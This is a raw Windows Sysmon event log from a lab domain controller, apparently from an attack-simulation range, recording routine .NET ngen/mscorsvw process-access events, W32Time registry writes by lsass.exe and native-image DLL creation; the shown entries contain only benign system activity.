13:48:59.059{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CB-6005-1D03-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.043{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CB-6005-1D03-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:59.043{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CB-6005-1D03-00000000A301}3804C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.731{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.731{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.731{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x80000000000000007417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000007416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000de213) 13241300x80000000000000007415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0x4ab3abe5) 13241300x80000000000000007414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda0-0xac7813e5) 13241300x80000000000000007413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0x0e3c7be5) 13241300x80000000000000007412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x80000000000000007411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000de213) 13241300x80000000000000007410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ed98-0x4ab3abe5) 13241300x80000000000000007409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6eda0-0xac7813e5) 10341000x80000000000000007408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.199{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CC-6005-2103-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:49:00.199{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6eda9-0x0e3c7be5) 10341000x80000000000000007406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.184{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91CC-6005-2103-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:00.184{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CC-6005-2103-00000000A301}4848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:00.106{59A5CD1D-91CB-6005-2003-00000000A301}4788C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12b4-0\System.Transactions.dll2021-01-18 13:49:00.106 10341000x80000000000000007427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.934{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.918{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.918{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CD-6005-2403-00000000A301}4040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.856{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CD-6005-2303-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.840{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91CD-6005-2303-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:01.840{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CD-6005-2303-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:01.746{59A5CD1D-91CC-6005-2203-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a2c-0\System.Web.Services.dll2021-01-18 13:49:01.746 10341000x80000000000000007441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.684{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.668{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.668{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2803-00000000A301}5016C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.512{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91CE-6005-2703-00000000A301}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.496{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91CE-6005-2703-00000000A301}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:02.496{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91CE-6005-2703-00000000A301}4752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\W